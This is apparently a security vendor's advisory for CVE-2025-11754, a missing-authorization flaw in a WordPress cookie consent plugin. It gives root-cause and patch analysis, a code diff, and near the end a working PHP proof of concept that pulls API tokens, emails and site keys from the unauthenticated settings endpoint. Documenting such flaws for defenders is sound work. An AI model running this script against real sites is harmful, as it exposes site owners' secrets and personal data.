What is CVE-2025-11754?

CVE-2025-11754 is a high-severity vulnerability in the GDPR Cookie Consent plugin for WordPress, specifically affecting versions up to and including 4.1.2. It allows unauthenticated attackers to access sensitive plugin settings through a missing authorization check on the REST API endpoint.

How does this vulnerability work?

The vulnerability exists in the ‘gdpr/v1/settings’ REST API endpoint, where the ‘get_items()’ method does not validate the requester’s authorization. Attackers can send a GET request to this endpoint and retrieve sensitive data such as API tokens and email addresses without any authentication.

Who is affected by this vulnerability?

Any WordPress site using the GDPR Cookie Consent plugin version 4.1.2 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the GDPR Cookie Consent plugin installed. If it is version 4.1.2 or earlier, your site is susceptible to this vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in version 4.1.3 of the GDPR Cookie Consent plugin. Administrators should update the plugin to this version or later to ensure that proper authorization checks are in place.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 is classified as high severity, indicating a significant risk to confidentiality. This means that the vulnerability can lead to the exposure of sensitive information, which could be exploited for further attacks.

What are the practical risks of this vulnerability?

If exploited, attackers can access sensitive plugin configuration data, which may include API tokens and email addresses. This information can be used for account takeover, unauthorized access to APIs, or to exploit other vulnerabilities.

What does the proof of concept demonstrate?

The proof of concept provided shows how an attacker can use a simple cURL request to access the vulnerable REST API endpoint without any authentication. This illustrates the ease with which sensitive data can be retrieved due to the lack of authorization checks.

What is the root cause of this vulnerability?

The root cause lies in the ‘get_items()’ method of the ‘GDPR_Cookie_Consent_API’ class, which returns plugin settings without checking if the requester has the necessary permissions. The endpoint was registered with a permission callback that allowed public access.

What changes were made in the patch?

The patch for this vulnerability introduced token-based authorization to the ‘get_items()’ method, requiring a valid token for access. This ensures that only authenticated requests can retrieve sensitive settings.

How does this vulnerability relate to GDPR and CCPA compliance?

Exposing sensitive data such as email addresses and API tokens can lead to violations of privacy regulations like GDPR and CCPA, which the plugin is designed to help enforce. Organizations must ensure that their implementations do not compromise compliance.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the REST API endpoint until the plugin can be updated. Additionally, monitor your site for any suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-11754: Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent <= 4.1.2 – Missing Authorization to Sensitive Information Exposure (gdpr-cookie-consent)

CVE ID CVE-2025-11754

Plugin gdpr-cookie-consent

Severity High (CVSS 7.5)

CWE 862

Vulnerable Version 4.1.2

Patched Version 4.1.3

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-11754:
The vulnerability is a missing authorization check in the GDPR Cookie Consent WordPress plugin’s REST API endpoint. This allows unauthenticated attackers to retrieve sensitive plugin configuration data. The CVSS 7.5 score reflects the high confidentiality impact of exposing API tokens, email addresses, account IDs, and site keys.

Root Cause:
The vulnerability exists in the `get_items()` method of the `GDPR_Cookie_Consent_API` class at `/gdpr-cookie-consent/includes/settings/class-gdpr-cookie-consent-api.php`. The function directly returns plugin settings without validating the requester’s authorization. The REST endpoint `/wp-json/gdpr/v1/settings` was registered with `permission_callback` set to `__return_true`, allowing complete public access. The missing capability check violates WordPress security best practices for REST API endpoints handling sensitive data.

Exploitation:
Attackers send a GET request to the vulnerable REST API endpoint. The request targets `/wp-json/gdpr/v1/settings` without requiring authentication tokens or nonces. No special parameters are needed. The server responds with the plugin’s complete configuration, including sensitive fields like API tokens, email addresses, account IDs, and site keys stored in the plugin’s settings.

Patch Analysis:
The patch adds token-based authorization to the `get_items()` method. It introduces a `token` parameter requirement and validates it against a stored token using `hash_equals()` for constant-time comparison. The `create_items_permissions_check()` method now performs comprehensive validation of both platform and token parameters. The patch also updates the plugin version from 4.1.2 to 4.1.3. These changes ensure only requests with valid authorization tokens can access sensitive settings.

Impact:
Successful exploitation exposes sensitive plugin configuration data including API tokens, email addresses, account IDs, and site keys. Attackers can use this information for further attacks such as account takeover, unauthorized API access, or integration with other vulnerabilities. The exposed data may also violate privacy regulations like GDPR and CCPA that the plugin is designed to help enforce.

Differential between vulnerable and patched code

Code Diff

--- a/gdpr-cookie-consent/admin/class-gdpr-cookie-consent-admin.php
+++ b/gdpr-cookie-consent/admin/class-gdpr-cookie-consent-admin.php
@@ -847,9 +847,6 @@
 	 * @return void
 	 */
 	public function wpl_consent_log_overview() {
-		if ( isset( $_GET['page'] ) && $_GET['page'] !== 'gdpr-cookie-consent' ) {
-			return;
-		}
 		ob_start();
 		include GDPR_COOKIE_CONSENT_PLUGIN_PATH . '/public/modules/consent-logs/class-wpl-consent-logs.php';
 		// Style for consent log report.
@@ -1270,17 +1267,17 @@
 			'request_for_access'        => array(
 				'short' => __( 'Request for access', 'gdpr-cookie-consent' ),
 				'long'  => __( 'Submit a request for access to the data we process about you.', 'gdpr-cookie-consent' ),
-				'slug'  => 'docs/wp-cookie-consent/how-to-guides/what-is-the-right-to-access/',
+				'slug'  => 'docs/wplp-docs/guides/what-is-the-right-to-access/',
 			),
 			'right_to_be_forgotten'     => array(
 				'short' => __( 'Right to be forgotten', 'gdpr-cookie-consent' ),
 				'long'  => __( 'Submit a request for deletion of the data if it is no longer relevant.', 'gdpr-cookie-consent' ),
-				'slug'  => 'docs/wp-cookie-consent/how-to-guides/right-to-be-forgotten/',
+				'slug'  => 'docs/wplp-docs/guides/what-is-the-right-to-be-forgotten/',
 			),
 			'right_to_data_portability' => array(
 				'short' => __( 'Right to data portability', 'gdpr-cookie-consent' ),
 				'long'  => __( 'Submit a request to receive an export file of the data we process about you.', 'gdpr-cookie-consent' ),
-				'slug'  => 'docs/wp-cookie-consent/how-to-guides/right-to-data-portability/',
+				'slug'  => 'docs/wplp-docs/guides/what-is-the-right-to-data-portability/',
 			),
 		);
 		return $options;
@@ -4293,7 +4290,7 @@

 					$readmore_style_attr = '';
 					foreach ($template['readmore_button'] as $key => $value) {
-						if($key == 'color') $readmore_style_attr .= esc_attr($key) . ':' . esc_attr($value) . ';';
+						if (in_array($key, ['color', 'text-decoration'], true)) $readmore_style_attr .= esc_attr($key) . ':' . esc_attr($value) . ';';
 					}
 					$heading_style_attr = "";
 					foreach ($template['heading'] as $key => $value) {
@@ -4420,7 +4417,7 @@

 					$readmore_style_attr = '';
 					foreach ($template['readmore_button'] as $key => $value) {
-						if($key == 'color') $readmore_style_attr .= esc_attr($key) . ':' . esc_attr($value) . ';';
+						if (in_array($key, ['color', 'text-decoration'], true))  $readmore_style_attr .= esc_attr($key) . ':' . esc_attr($value) . ';';
 					}
 					$heading_style_attr = "";
 					foreach ($template['heading'] as $key => $value) {
--- a/gdpr-cookie-consent/admin/data-req/class-wpl-data-req-table.php
+++ b/gdpr-cookie-consent/admin/data-req/class-wpl-data-req-table.php
@@ -399,7 +399,7 @@
 				$options = Gdpr_Cookie_Consent_Admin::wpl_data_reqs_options();
 				foreach ( $options as $fieldname => $label ) {
 					if ( $request->{$fieldname} == 1 ) {
-						$datarequest = '<a href="https://club.wpeka.com/' . $label['slug'] . '" target="_blank">' . $label['short'] . '</a>';
+						$datarequest = '<a href="https://wplegalpages.com/' . $label['slug'] . '" target="_blank">' . $label['short'] . '</a>';
 					}
 				}
 				$time = gmdate( get_option( 'time_format' ), $request->request_date );
--- a/gdpr-cookie-consent/admin/gdpr-cookie-consent-admin-settings.php
+++ b/gdpr-cookie-consent/admin/gdpr-cookie-consent-admin-settings.php
@@ -175,6 +175,16 @@
 							<a  v-if="!is_ccpa && this[`button_readmore_is_on${active_test_banner_tab}`]" :style="{
 								'font-family': this[`cookie_font${active_test_banner_tab}`],
 								'color':button_readmore_link_color,
+								'textDecoration':
+									(template === 'blue_full' ||
+									template === 'blue_center' ||
+									template === 'blue_center_column' ||
+									template === 'blue_split' ||
+									template === 'gray' ||
+									template === 'bold' ||
+									template === 'dark' )
+										? 'underline'
+										: 'none',
 								'border-style': button_readmore_as_button ? button_readmore_button_border_style : 'none',
 								'border-width': button_readmore_as_button ? button_readmore_button_border_width + 'px':'0',
 								'border-color': button_readmore_as_button ? button_readmore_button_border_color : 'transparent',
@@ -385,6 +395,16 @@
 							<a v-if="!is_ccpa && button_readmore_is_on" :style="{
 								'font-family': cookie_font,
 								'color':button_readmore_link_color,
+								'textDecoration':
+									(template === 'blue_full' ||
+									template === 'blue_center' ||
+									template === 'blue_center_column' ||
+									template === 'blue_split' ||
+									template === 'gray' ||
+									template === 'bold' ||
+									 template === 'dark' )
+										? 'underline'
+										: 'none',
 								'border-style': button_readmore_as_button ? button_readmore_button_border_style : 'none',
 								'border-width': button_readmore_as_button ? button_readmore_button_border_width + 'px':'0',
 								'border-color': button_readmore_as_button ? button_readmore_button_border_color : 'transparent',
@@ -581,6 +601,16 @@
 							<a v-if="active_default_multiple_legislation === 'gdpr' && button_readmore_is_on" :style="{
 								'font-family': multiple_legislation_cookie_font1,
 								'color':button_readmore_link_color,
+								'textDecoration':
+									(template === 'blue_full' ||
+									template === 'blue_center' ||
+									template === 'blue_center_column' ||
+									template === 'blue_split' ||
+									template === 'gray' ||
+									template === 'bold' ||
+									template === 'dark' )
+										? 'underline'
+										: 'none',
 								'border-style': button_readmore_as_button ? button_readmore_button_border_style : 'none',
 								'border-width': button_readmore_as_button ? button_readmore_button_border_width + 'px':'0',
 								'border-color': button_readmore_as_button ? button_readmore_button_border_color : 'transparent',
--- a/gdpr-cookie-consent/admin/modules/cookie-custom/class-gdpr-cookie-consent-cookie-custom.php
+++ b/gdpr-cookie-consent/admin/modules/cookie-custom/class-gdpr-cookie-consent-cookie-custom.php
@@ -53,12 +53,7 @@
 	public function __construct() {
 		// Creating necessary tables for cookie custom.
 		register_activation_hook( GDPR_COOKIE_CONSENT_PLUGIN_FILENAME, array( $this, 'gdpr_activator' ) );
-		$this->status_labels = array(
-			0 => '',
-			1 => __( 'Incomplete', 'gdpr-cookie-consent' ),
-			2 => __( 'Completed', 'gdpr-cookie-consent' ),
-			3 => __( 'Stopped', 'gdpr-cookie-consent' ),
-		);
+		add_action('admin_init',  array($this, 'set_status_labels'));
 		if ( Gdpr_Cookie_Consent::is_request( 'admin' ) ) {
 			add_filter( 'gdpr_module_settings_tabhead', array( __CLASS__, 'settings_tabhead' ) );
 			add_filter( 'gdpr_settings_cookie_list_values', array( $this, 'gdpr_settings_cookie_list_values' ) );
@@ -67,6 +62,14 @@
 		}
 	}

+	public function set_status_labels(){
+		$this->status_labels = array(
+			0 => '',
+			1 => __( 'Incomplete', 'gdpr-cookie-consent' ),
+			2 => __( 'Completed', 'gdpr-cookie-consent' ),
+			3 => __( 'Stopped', 'gdpr-cookie-consent' ),
+		);
+	}
 	/**
 	 * Settings for Cookies About message under General Tab.
 	 *
@@ -443,4 +446,4 @@
 		return $cookies_array;
 	}
 }
-new Gdpr_Cookie_Consent_Cookie_Custom();
+new Gdpr_Cookie_Consent_Cookie_Custom();
 No newline at end of file
--- a/gdpr-cookie-consent/admin/modules/cookie-scanner/class-wpl-cookie-consent-cookie-scanner.php
+++ b/gdpr-cookie-consent/admin/modules/cookie-scanner/class-wpl-cookie-consent-cookie-scanner.php
@@ -121,12 +121,7 @@
 	public function __construct() {
 		// Creating necessary tables for cookie scanner.
 		register_activation_hook( GDPR_COOKIE_CONSENT_PLUGIN_FILENAME, array( $this, 'wpl_activator' ) );
-		$this->status_labels = array(
-			0 => '',
-			1 => __( 'Incomplete', 'gdpr-cookie-consent' ),
-			2 => __( 'Completed', 'gdpr-cookie-consent' ),
-			3 => __( 'Stopped', 'gdpr-cookie-consent' ),
-		);
+		add_action('admin_init',  array($this, 'set_status_labels'));
 		if ( Gdpr_Cookie_Consent::is_request( 'admin' ) ) {
 			add_filter( 'gdprcookieconsent_cookie_sub_tabs', array( $this, 'wpl_cookie_sub_tabs' ), 10, 1 );
 			add_action( 'gdpr_module_settings_cookielist', array( $this, 'wpl_cookie_scanned_cookies' ), 10 );
@@ -151,6 +146,14 @@
 		$this->class_for_card_body_blur_content = $this->is_user_connected ? '' : 'gdpr-body-blur-background'; // Add a class for styling purposes

 	}
+	public function set_status_labels(){
+		$this->status_labels = array(
+			0 => '',
+			1 => __( 'Incomplete', 'gdpr-cookie-consent' ),
+			2 => __( 'Completed', 'gdpr-cookie-consent' ),
+			3 => __( 'Stopped', 'gdpr-cookie-consent' ),
+		);
+	}
 	public function register_cookie_scanner_script(){
 		//getting scan data
 		wp_enqueue_script('cookie_scanner_ajax', plugin_dir_url(__FILE__) . 'assets/js/cookie-scanner-data.js', array('jquery', 'gdpr-cookie-consent-admin-revamp'), '1.0', true);
@@ -1060,7 +1063,7 @@
 			$latest_scan_id = $wpdb->get_var("SELECT id_wpl_cookie_scan FROM $scan_table WHERE status = '2' ORDER BY created_at DESC LIMIT 1");

 			if ($latest_scan_id) {
-				$count_sql     = $wpdb->prepare("SELECT COUNT(id_wpl_cookie_scan_cookies) AS ttnum FROM $cookies_table");
+				$count_sql     = "SELECT COUNT(id_wpl_cookie_scan_cookies) AS ttnum FROM $cookies_table";
 				$count_arr     = $wpdb->get_row($count_sql, ARRAY_A);
 				if ( $count_arr ) {
 					$out['total'] = $count_arr['ttnum'];
@@ -1099,4 +1102,4 @@
 	}

 }
-new Gdpr_Cookie_Consent_Cookie_Scanner();
+new Gdpr_Cookie_Consent_Cookie_Scanner();
 No newline at end of file
--- a/gdpr-cookie-consent/admin/modules/cookie-scanner/classes/class-wpl-cookie-consent-cookie-scanner-ajax.php
+++ b/gdpr-cookie-consent/admin/modules/cookie-scanner/classes/class-wpl-cookie-consent-cookie-scanner-ajax.php
@@ -622,9 +622,7 @@
 				if ( ! empty( $ccategory ) ) {
 					$data_arr['category_id'] = $ccategory;
 				}
-				if ( ! empty( $cdesc ) ) {
-					$data_arr['description'] = $cdesc;
-				}
+				$data_arr['description'] = $cdesc; // can be empty string
 				$update_status = $wpdb->update( $cookies_table, $data_arr, array( 'id_wpl_cookie_scan_cookies' => $cid ) ); // db call ok; no-cache ok.
 				if ( $update_status >= 1 ) {
 					$flag            = 1;
--- a/gdpr-cookie-consent/gdpr-cookie-consent.php
+++ b/gdpr-cookie-consent/gdpr-cookie-consent.php
@@ -10,7 +10,7 @@
  * Plugin Name:       Cookie Banner for GDPR / CCPA - WPLP Cookie Consent
  * Plugin URI:        https://wplegalpages.com/
  * Description:       Cookie Consent will help you put up a subtle banner in the footer of your website to showcase compliance status regarding the EU Cookie law.
- * Version:           4.1.2
+ * Version:           4.1.3
  * Author:            WPLP Compliance Platform
  * Author URI:        https://wplegalpages.com
  * License:           GPLv3
@@ -31,7 +31,7 @@
 /**
  * Currently plugin version.
  */
-define( 'GDPR_COOKIE_CONSENT_VERSION', '4.1.2' );
+define( 'GDPR_COOKIE_CONSENT_VERSION', '4.1.3' );
 define( 'GDPR_COOKIE_CONSENT_PLUGIN_DEVELOPMENT_MODE', false );
 define( 'GDPR_COOKIE_CONSENT_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
 define( 'GDPR_COOKIE_CONSENT_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
--- a/gdpr-cookie-consent/includes/class-gdpr-cookie-consent.php
+++ b/gdpr-cookie-consent/includes/class-gdpr-cookie-consent.php
@@ -85,7 +85,7 @@
 		if ( defined( 'GDPR_COOKIE_CONSENT_VERSION' ) ) {
 			$this->version = GDPR_COOKIE_CONSENT_VERSION;
 		} else {
-			$this->version = '4.1.2';
+			$this->version = '4.1.3';
 		}
 		add_action(
 			'current_screen',
--- a/gdpr-cookie-consent/includes/settings/class-gdpr-cookie-consent-api.php
+++ b/gdpr-cookie-consent/includes/settings/class-gdpr-cookie-consent-api.php
@@ -62,9 +62,21 @@
 	 * @return WP_Error|WP_REST_Response
 	 */
 	public function get_items( $request ) {
+		$token = $request->get_param( 'token' );
 		require_once GDPR_COOKIE_CONSENT_PLUGIN_PATH . 'includes/settings/class-gdpr-cookie-consent-settings.php';
-		$object = new GDPR_Cookie_Consent_Settings();
-		$data   = $object->get();
+		$settings = new GDPR_Cookie_Consent_Settings();
+		$stored_token = $settings->get_token();
+
+		// Double-check token validation in callback
+		if ( empty( $stored_token ) || ! hash_equals( $stored_token, $token ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				esc_html__( 'Invalid Authorization.', 'gdpr-cookie-consent' ),
+				array( 'status' => rest_authorization_required_code() )
+			);
+		}
+
+		$data = $settings->get();
 		return rest_ensure_response( $data );
 	}

@@ -76,17 +88,51 @@
 	 */
 	public function create_items_permissions_check( $request ) {

-		$permission_check = false;
 		$token            = $request->get_param( 'token' );
 		$request_platform = $request->get_param( 'platform' );

-		if ( isset( $token ) && 'wordpress' === $request_platform ) {
-			return true;
-		} else {
-			return new WP_Error( 'rest_forbidden', esc_html__( 'Invalid Authorization.', 'gdpr-cookie-consent' ), array( 'status' => rest_authorization_required_code() ) );
+		// Validate platform
+		if ( 'wordpress' !== $request_platform ) {
+			return new WP_Error(
+				'rest_forbidden',
+				esc_html__( 'Invalid platform.', 'gdpr-cookie-consent' ),
+				array( 'status' => rest_authorization_required_code() )
+			);
+		}
+
+		// Token must be provided
+		if ( empty( $token ) ) {
+
+			return new WP_Error(
+				'rest_forbidden',
+				esc_html__( 'Token missing.', 'gdpr-cookie-consent' ),
+				array( 'status' => rest_authorization_required_code() )
+			);
 		}

-		return $permission_check;
+		// Get stored token from settings
+		require_once GDPR_COOKIE_CONSENT_PLUGIN_PATH . 'includes/settings/class-gdpr-cookie-consent-settings.php';
+		$settings = new GDPR_Cookie_Consent_Settings();
+		$stored_token = $settings->get_token();
+
+		// If no token stored → deny
+		if ( empty( $stored_token ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				esc_html__( 'No token configured.', 'gdpr-cookie-consent' ),
+				array( 'status' => rest_authorization_required_code() )
+			);
+		}
+
+		// Constant-time secure comparison
+		if ( ! hash_equals( $stored_token, $token ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				esc_html__( 'Invalid authorization token.', 'gdpr-cookie-consent' ),
+				array( 'status' => rest_authorization_required_code() )
+			);
+		}
+		return true;
 	}

 }
--- a/gdpr-cookie-consent/public/templates/cookie-notice.php
+++ b/gdpr-cookie-consent/public/templates/cookie-notice.php
@@ -91,6 +91,20 @@
 	}
 	$readmore_style_attr = "";
 	$readmore_style_attr .= " color: {$the_options['button_readmore_link_color']};";
+	if (
+		$template_object['name'] === 'blue_full' ||
+		$template_object['name'] === 'blue_center' ||
+		$template_object['name'] === 'blue_center_column' ||
+		$template_object['name'] === 'blue_split' ||
+		$template_object['name'] === 'gray' ||
+		$template_object['name'] === 'bold' ||
+		$template_object['name'] === 'dark'
+	) {
+		$readmore_style_attr .= "text-decoration: underline;";
+	} else {
+		$readmore_style_attr .= "text-decoration: none;";
+	}
+
 	if ($the_options['button_readmore_as_button'] === 'true' || $the_options['button_readmore_as_button'] === true || $the_options['button_readmore_as_button'] === 1) {
 		$padding_key = 'button_padding';
 		$padding_value = $template_object['static-settings'][$padding_key] ?? '';
--- a/gdpr-cookie-consent/wc-am-client-gdpr.php
+++ b/gdpr-cookie-consent/wc-am-client-gdpr.php
@@ -121,13 +121,7 @@
 				/**
 				 * Set all admin menu data
 				 */
-				$this->wc_am_deactivate_checkbox_key     = $this->data_key . '_deactivate_checkbox';
-				$this->wc_am_activation_tab_key          = $this->data_key . '_dashboard';
-				$this->wc_am_deactivation_tab_key        = $this->data_key . '_deactivation';
-				$this->wc_am_settings_menu_title         = $this->software_title . esc_html__( ' Activation', 'gdpr-cookie-consent'  );
-				$this->wc_am_settings_title              = $this->software_title . esc_html__( ' API Key Activation', 'gdpr-cookie-consent'  );
-				$this->wc_am_menu_tab_activation_title   = esc_html__( 'API Key Activation', 'gdpr-cookie-consent'  );
-				$this->wc_am_menu_tab_deactivation_title = esc_html__( 'API Key Deactivation', 'gdpr-cookie-consent'  );
+				add_action( 'admin_init', array($this, 'setup_admin_menu_titles') );

 				/**
 				 * Set all software update data here
@@ -168,7 +162,16 @@
 				add_action( 'switch_theme', array( $this, 'uninstall' ) );
 			}
 		}
-
+
+		public function setup_admin_menu_titles() {
+			$this->wc_am_deactivate_checkbox_key     = $this->data_key . '_deactivate_checkbox';
+			$this->wc_am_activation_tab_key          = $this->data_key . '_dashboard';
+			$this->wc_am_deactivation_tab_key        = $this->data_key . '_deactivation';
+			$this->wc_am_settings_menu_title         = $this->software_title . esc_html__( ' Activation', 'gdpr-cookie-consent'  );
+			$this->wc_am_settings_title              = $this->software_title . esc_html__( ' API Key Activation', 'gdpr-cookie-consent'  );
+			$this->wc_am_menu_tab_activation_title   = esc_html__( 'API Key Activation', 'gdpr-cookie-consent'  );
+			$this->wc_am_menu_tab_deactivation_title = esc_html__( 'API Key Deactivation', 'gdpr-cookie-consent'  );
+		}

 		/**
 		 * Generate the default data.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-11754 - Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent <= 4.1.2 - Missing Authorization to Sensitive Information Exposure

<?php

$target_url = 'http://vulnerable-wordpress-site.com';

// Construct the vulnerable REST API endpoint
$api_endpoint = $target_url . '/wp-json/gdpr/v1/settings';

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);

// No authentication required - this is the vulnerability
// The endpoint should require authorization but doesn't

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
    curl_close($ch);
    exit(1);
}

curl_close($ch);

// Process the response
if ($http_code === 200) {
    $data = json_decode($response, true);
    
    if ($data && !empty($data)) {
        echo "[+] SUCCESS: Retrieved sensitive plugin settingsn";
        echo "[+] HTTP Status: $http_codenn";
        
        // Display potentially sensitive fields
        $sensitive_fields = ['api_token', 'email', 'account_id', 'site_key', 'token', 'secret'];
        
        foreach ($sensitive_fields as $field) {
            if (isset($data[$field])) {
                echo "[!] Sensitive field '$field' found: " . $data[$field] . "n";
            }
        }
        
        // Show total number of settings exposed
        echo "n[+] Total settings exposed: " . count($data) . "n";
        
        // Optional: Save full response to file
        file_put_contents('cve-2025-11754_exposed_settings.json', json_encode($data, JSON_PRETTY_PRINT));
        echo "[+] Full response saved to cve-2025-11754_exposed_settings.jsonn";
    } else {
        echo "[-] Received empty or invalid JSON responsen";
        echo "Response: $responsen";
    }
} else {
    echo "[-] Request failed with HTTP status: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2025-11754?
Overview of the vulnerability
CVE-2025-11754 is a high-severity vulnerability in the GDPR Cookie Consent plugin for WordPress, specifically affecting versions up to and including 4.1.2. It allows unauthenticated attackers to access sensitive plugin settings through a missing authorization check on the REST API endpoint.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the ‘gdpr/v1/settings’ REST API endpoint, where the ‘get_items()’ method does not validate the requester’s authorization. Attackers can send a GET request to this endpoint and retrieve sensitive data such as API tokens and email addresses without any authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the GDPR Cookie Consent plugin version 4.1.2 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the GDPR Cookie Consent plugin installed. If it is version 4.1.2 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Recommended action
The vulnerability is patched in version 4.1.3 of the GDPR Cookie Consent plugin. Administrators should update the plugin to this version or later to ensure that proper authorization checks are in place.
What does a CVSS score of 7.5 indicate?
Understanding severity levels
A CVSS score of 7.5 is classified as high severity, indicating a significant risk to confidentiality. This means that the vulnerability can lead to the exposure of sensitive information, which could be exploited for further attacks.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, attackers can access sensitive plugin configuration data, which may include API tokens and email addresses. This information can be used for account takeover, unauthorized access to APIs, or to exploit other vulnerabilities.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept provided shows how an attacker can use a simple cURL request to access the vulnerable REST API endpoint without any authentication. This illustrates the ease with which sensitive data can be retrieved due to the lack of authorization checks.
What is the root cause of this vulnerability?
Technical details of the issue
The root cause lies in the ‘get_items()’ method of the ‘GDPR_Cookie_Consent_API’ class, which returns plugin settings without checking if the requester has the necessary permissions. The endpoint was registered with a permission callback that allowed public access.
What changes were made in the patch?
Details of the security fix
The patch for this vulnerability introduced token-based authorization to the ‘get_items()’ method, requiring a valid token for access. This ensures that only authenticated requests can retrieve sensitive settings.
How does this vulnerability relate to GDPR and CCPA compliance?
Impact on privacy regulations
Exposing sensitive data such as email addresses and API tokens can lead to violations of privacy regulations like GDPR and CCPA, which the plugin is designed to help enforce. Organizations must ensure that their implementations do not compromise compliance.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the REST API endpoint until the plugin can be updated. Additionally, monitor your site for any suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations